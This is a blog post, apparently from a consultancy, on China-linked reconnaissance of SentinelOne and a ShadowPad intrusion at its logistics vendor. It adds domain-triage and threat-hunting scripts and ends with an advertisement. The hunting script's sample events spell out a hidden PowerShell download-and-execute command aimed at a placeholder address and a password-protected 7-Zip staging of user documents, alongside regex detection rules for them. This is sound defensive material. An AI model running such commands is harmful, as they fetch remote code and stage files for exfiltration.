China-Affiliated Threat Actors Mount Sophisticated Supply-Chain Campaign


Jun 12, 2025, by Ethan Coulthard

Introduction

SentinelOne’s threat research unit, SentinelLabs, has disclosed two China-linked activity clusters that targeted the company: PurpleHaze, linked to APT15/UNC5174, which carried out direct reconnaissance of SentinelOne’s infrastructure, and a ShadowPad operation matching APT41’s profile, which reached SentinelOne indirectly by compromising a third-party IT services and logistics vendor.


Reconnaissance of SentinelOne Infrastructure

In October 2024, SentinelLabs detected a reconnaissance operation, dubbed PurpleHaze, in which threat actors scanned SentinelOne’s internet-facing servers and registered lookalike domains such as sentinelxdr[.]us and secmailbox[.]us. The activity aimed to map SentinelOne’s attack surface and assess it for potential footholds; SentinelOne reported that no compromise resulted.
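Lookalike domains like the two above are cheap to register and easy to miss in a raw feed of newly observed domains. The script below is an added example, not SentinelLabs’ or the article’s code: it triages a feed for domains that embed a protected brand label, sit within a small edit distance of it, or combine a security product token with a credential-lure word (which is what catches secmailbox[.]us, a domain that never mentions the brand). The brand, token and allowlist values and the edit-distance threshold are assumptions chosen for illustration, and the feed is constructed.

```python
"""Triage newly observed domains for impersonation of a protected brand.

Added example (not SentinelLabs' or the article's code). Brand, product and
lure token lists, the allowlist and the edit-distance threshold are assumptions
chosen for illustration; tune them to your own brands and telemetry.
"""

# Assumed configuration for the organisation being protected.
BRAND_LABELS = ("sentinelone", "sentinel")             # brand strings to protect
SECURITY_TOKENS = ("xdr", "edr", "mdr", "soc", "sec")  # product-line words
LURE_TOKENS = ("mail", "mailbox", "login", "sso", "portal", "support")
ALLOWLIST = {"sentinelone.com"}                        # legitimately owned domains
MAX_EDITS = 2                                          # typosquat distance threshold


def normalise(domain: str) -> str:
    """Lower-case and strip common defanging such as example[.]us or example[.us]."""
    return (domain.strip().lower().replace("[.]", ".")
            .replace("[", "").replace("]", "").rstrip("."))


def registrable_label(domain: str) -> str:
    """Label left of the TLD (crude: ignores multi-part suffixes such as co.uk)."""
    parts = normalise(domain).split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def score_domain(domain: str) -> list[str]:
    """Reasons a domain looks like brand impersonation (empty list = not flagged)."""
    if normalise(domain) in ALLOWLIST:
        return []
    label = registrable_label(domain)
    reasons = []
    embedded = [b for b in BRAND_LABELS if b in label]
    if embedded:
        reasons.append(f"contains brand label '{embedded[0]}'")
    else:
        for brand in BRAND_LABELS:
            dist = edit_distance(label, brand)
            if 0 < dist <= MAX_EDITS:
                reasons.append(f"within {dist} edit(s) of '{brand}'")
    sec = [t for t in SECURITY_TOKENS if t in label]
    lure = [t for t in LURE_TOKENS if t in label]
    if sec and lure:
        reasons.append(f"security/lure token combination: {sec} + {lure}")
    return reasons


def triage(feed: list[str]) -> dict[str, list[str]]:
    """Run score_domain over a feed of newly observed domains and keep only the hits."""
    return {d: r for d in feed if (r := score_domain(d))}


# Constructed sample feed: the two domains named in the SentinelLabs report
# plus invented benign and typosquat entries for contrast.
SAMPLE_FEED = [
    "sentinelxdr[.]us",
    "secmailbox[.]us",
    "sentineione.net",   # invented typosquat (l -> i)
    "sentinelone.com",   # allowlisted
    "example.org",
]

if __name__ == "__main__":
    for domain, reasons in triage(SAMPLE_FEED).items():
        print(f"{domain}: {'; '.join(reasons)}")
```

Feed the function certificate-transparency or passive-DNS output and review only the hits; the token-combination rule is deliberately broad and expects a human to discard noise, which is the right trade-off for a brand-monitoring queue.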

Supply Chain Intrusion via a Third-Party Vendor

Early in 2025, a second and separately attributed wave of activity reached SentinelOne indirectly. The attackers compromised an IT services and logistics provider that handles hardware shipments for SentinelOne. ShadowPad malware, obfuscated with the ScatterBrain obfuscator, was deployed through PowerShell scripts that delayed their execution, and the attackers relied on scheduled system reboots to clear the implant from memory. On compromised hosts they also installed the open-source Nimbo-C2 framework, which gave them remote access, screenshot capture, a UAC bypass, and file collection staged in password-protected 7-Zip archives for exfiltration. Despite this intrusion at the vendor, SentinelOne itself was not compromised.
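Each of the three behaviours in that paragraph leaves a process-creation artefact that a vendor’s own endpoint telemetry can catch: PowerShell combining a sleep with a download-and-execute primitive, a scheduled task whose action is a reboot, and 7-Zip invoked with the -p password switch. The rule set below is an added example, not SentinelLabs’ or the article’s detection content; the sample events, hostnames, paths and the 203.0.113.10 address (RFC 5737 documentation range) are constructed, and the regexes are illustrative assumptions rather than tuned production logic.

```python
"""Hunt process-creation telemetry for the ShadowPad-style tradecraft described.

Added example (not SentinelLabs' or the article's code). The events below are
constructed; the regexes encode three behaviours from the report (delayed
PowerShell execution, scheduled reboots, password-protected 7-Zip archives)
and are illustrative assumptions, not vendor detection content.
"""
import re

# Each rule: (name, image basenames it applies to, regexes that must ALL match
# the command line).  Patterns are assumptions for this example.
RULES = [
    ("delayed_powershell",
     {"powershell.exe", "pwsh.exe"},
     [r"(?i)\bstart-sleep\b",
      r"(?i)(-e(nc|ncodedcommand)?\b|\biex\b|invoke-expression)"]),
    ("scheduled_reboot",
     {"schtasks.exe"},
     [r"(?i)/create\b",
      r"(?i)shutdown(\.exe)?\s+[/-]r\b"]),
    ("7zip_password_archive",
     {"7z.exe", "7za.exe", "7zr.exe"},
     [r"(^|\s)a(\s|$)",          # 'a' = add to archive
      r"(^|\s)-p\S*"]),          # -p{password} switch
]


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works off-Windows too)."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events: list[dict]) -> list[dict]:
    """Return one hit per (rule, event) whose image and command line satisfy a rule."""
    hits = []
    for ev in events:
        image = basename(ev.get("image", ""))
        cmd = ev.get("cmdline", "")
        for name, images, patterns in RULES:
            if image in images and all(re.search(p, cmd) for p in patterns):
                hits.append({"rule": name, "host": ev.get("host"), "cmdline": cmd})
    return hits


# Constructed sample events in a Sysmon-like shape; hostnames, paths and the
# 203.0.113.10 address (RFC 5737 documentation range) are invented.
SAMPLE_EVENTS = [
    {"host": "VENDOR-WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -c \"Start-Sleep -Seconds 600; "
                "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u')\""},
    {"host": "VENDOR-WS01",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /create /tn SysMaint /tr \"shutdown.exe /r /t 0\" "
                "/sc once /st 03:00 /ru SYSTEM"},
    {"host": "VENDOR-WS02",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pHunter2 -mhe=on C:\Users\Public\stage.7z C:\Users\alice\Documents"},
    {"host": "VENDOR-WS03",   # benign: no sleep, no download primitive
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "VENDOR-WS03",   # benign: extraction, no password switch
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe x update.zip -oC:\temp\update"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] {hit['host']}: {hit['cmdline']}")
```

Because the implant is cleared by reboots, the process-creation record is often the only durable evidence, so ship these events to a collector the attacker cannot purge and correlate the three rules by host and time window rather than alerting on any one alone.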

Attribution & Attack Sophistication

The PurpleHaze activity (Sept–Oct 2024) is linked to APT15/UNC5174 on the basis of its exploitation of Ivanti zero-day vulnerabilities and its use of GOREshell, a custom Go-based backdoor. The ShadowPad operations observed from June 2024 onward match APT41’s profile: modular malware, advanced obfuscation, and hands-on remote access. Infrastructure reuse, domain naming conventions, and the timing of the activity all reinforce attribution to Chinese espionage actors.

Strategic Implications

Targeting cybersecurity vendors and their supply chains demonstrates notable adversary sophistication. Security providers such as SentinelOne are high-value targets, not only for access to their internal systems but also for the leverage a compromised vendor would give over downstream customers, since a security vendor’s agents and management consoles run with high privilege inside customer environments. With the vendors’ own perimeters hardened, attackers increasingly probe peripheral entities such as logistics and IT service providers, where they are less likely to be detected.

Recommended Defense Strategies

  • Adopt Zero Trust practices for supply chains: verify every third-party connection, scope vendor access to the minimum each engagement needs, and log and monitor that access.
  • Require recognised security frameworks and certifications from critical vendors (e.g., ISO 27001, the NIST Cybersecurity Framework, CIS Controls) and conduct regular security audits of them.
  • Participate in threat intelligence sharing (ISACs, fusion centers) to accelerate detection of supply-chain compromise.

Conclusion

The SentinelOne case underscores a rising trend in cybersecurity: even the most fortified organizations can be placed at risk through the vulnerable services and vendors they rely on. State-sponsored actors are adapting by taking indirect paths to high-value access and long-term espionage. As attackers grow more sophisticated and global in scope, defenders must meet them with deeper collaboration, greater transparency, and resilient architectures designed with such attacks in mind. If your company has concerns about its security posture, consider TechHorizon Consulting's vCISO service. With this service we can help bolster your internal security for a fraction of the cost of hiring a full-time CISO. If this interests you, please visit our "Contact Us" page.